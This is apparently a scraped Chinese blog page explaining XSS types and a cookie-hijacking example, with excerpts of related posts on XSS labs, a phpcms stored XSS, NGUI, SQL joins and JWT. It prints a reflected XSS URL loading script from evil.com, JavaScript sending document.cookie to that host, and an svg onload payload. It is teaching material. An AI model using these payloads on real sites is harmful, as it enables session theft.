XSS(Cross Site Script)

类型一:反射型XSS

简单地把用户输入的数据“反射”给浏览器。也就是说,黑客需要诱使用户“点击”一个恶意链接,才能攻击成功。

类型二:存储型XSS

把用户输入的数据“存储”在服务器端。这种XSS具有很强的稳定性。

类型三:DOM Based XSS

通过修改页面DOM节点形成的XSS,称之为DOM Based XSS。

XSS Payload:

XSS攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过恶意脚本,控制用户的浏览器。这些完成各种具体功能的恶意脚本,被称为”XSS Payload“。

XSS Payload实际上就是JavaScript脚本。

Cookie劫持案例:

http://www.a.com/test.htm?abc="><script src=http://www.evil.com/evil.js></script>

Payload写在这个远程脚本中,避免直接在URL的参数里写入大量的JavaScript代码。在evil.js中,可通过如下代码窃取Cookie:

var img = document.createElement("img");
img.src = "http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);

这段代码在页面插入了一张看不见的图片,同时把document.cookie对象作为参数发送到远程服务器。

Cookie的”HttpOnly“标识可以防止”Cookie劫持“。

原文地址:https://www.cnblogs.com/lwfiwo/p/10620219.html

时间: 2024-07-31 12:18:42

XSS(Cross Site Script)的相关文章

xss (Cross Site Scripting)跨站脚本攻击

XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS. XSS攻击分成两类: 一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞. 另一类则是来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页.如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构

XSS跨站脚本(pikachu)——反射型xss(get和post)

XSS漏洞是危害比较大的一个漏洞了,主要危害的是前端用户.XSS漏洞可以用来进行钓鱼攻击,前端JS挖矿,用户cookie获取.甚至可以结合浏览器自身的漏洞对用户主机进行远程控制. 这是我从B站学习视频上截取到的攻击过程的图片觉得比较生动形象.  我们需要了解XSS的三种基本类型 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一次性,所见即所得,一般容易出现在搜索页面. 存储型XSS:<持久化>

phpcms某处储存型XSS(demo+本地演示)

详细说明: demo+本地演示 存在XSS的地方在商务中心的商家资料的我的资料的Email那里(这句话好绕口..),属于过滤不严格随便插字符的问题,我直接在Email那里写上"/><svg onload=alert(/1/)>可以看到是正确的 然后点击提交可以看到说操作成功 然后来到我们的企业首页查看可以看到成功弹窗 ? ? 再查看下源代码,可以看到是储存型的 本来想去后台查看的,但是无奈demo不提供后台演示,只好本地搭建看看了,本地搭建好了以后来到后台查看是不能直接打后台的

NGUI的输入框的校验(input filed script)

一,我们制作一个输入框,右键添加Sprite ,给Sprite添加一个child的label,然后给Sprite添加一个box collider,接着添加input filed script,将label绑定到UIInput的label中,结果如下图: 二,看上图,我们发现UIInput有三个属性,Character Limit,Input Type和Validation来控制输入类型 Input Type:输入类型(standard)标准的,(AutoCorrect)自动修正,(Passwor

NGUI的下拉框的使用(popup list script)

一,我们先添加一个sprite,选择sprite,右键选择attach,添加box collider, 然后右键选择attach,添加popup list script ,我们给popup list 的options 添加文字,这就是下拉框的值,得到如下图结果: default是当运行时默认选中的值: 二,我们给sprite添加一个label,并设置下面属性: 我们就可以得到当选择下拉框时,值改变,会在当前绑定的label对象显示,效果如下: 原文地址:https://www.cnblogs.c

SQL中的JOIN类型解释(CROSS, INNER,OUTER),关键字ON,USING

书上讲得明白,解了不少迷惑. SELECT e.fname, e.lname, d.name FROM employee AS e INNER JOIN department AS d ON e.dept_id = d.dept_id; SELECT e.fname, e.lname, d.name FROM employee AS e INNER JOIN department AS d USING (dept_id);

程序员常用的3大Web安全漏洞防御解决方案:XSS、CSRF及SQL注入(图文详解)

https://blog.csdn.net/ChenRui_yz/article/details/86489067 随着互联网的普及,网络安全变得越来越重要,程序员需要掌握最基本的web安全防范,下面列举一些常见的安全漏洞和对应的防御措施.01 常见的Web安全问题 1.前端安全 XSS 漏洞 CSRF 漏洞 2.后端安全 SQL 注入漏洞 程序员学架构mikechen优知02 XSS漏洞 1.XSS简介 跨站脚本(cross site script)简称为XSS,是一种经常出现在web应用中的

web安全(xss攻击和csrf攻击)

1.CSRF攻击: CSRF(Cross-site request forgery):跨站请求伪造. (1).攻击原理: 如上图,在B网站引诱用户访问A网站(用户之前登录过A网站,浏览器 cookie 缓存了身份验证信息), 通过调用A网站的接口攻击A网站. (2).防御措施: 1)token验证:登陆成功后服务器下发token令牌存到用户本地,再次访问时要主动发送token,浏览器只能主动发cookie,做不到主动发token 2)referer验证:判断页面来源是否自己站点的页面,不是不执行

JWT(JSON Web Token)

摘要: 在Web应用中,使用JWT替代session并不是个好主意 适合JWT的使用场景 抱歉,当了回标题党.我并不否认JWT的价值,只是它经常被误用. 什么是JWT 根据维基百科的定义,JSON WEB Token(JWT,读作 [/d??t/]),是一种基于JSON的.用于在网络上声明某种主张的令牌(token).JWT通常由三部分组成: 头信息(header), 消息体(payload)和签名(signature). 头信息指定了该JWT使用的签名算法: header = '{"alg&q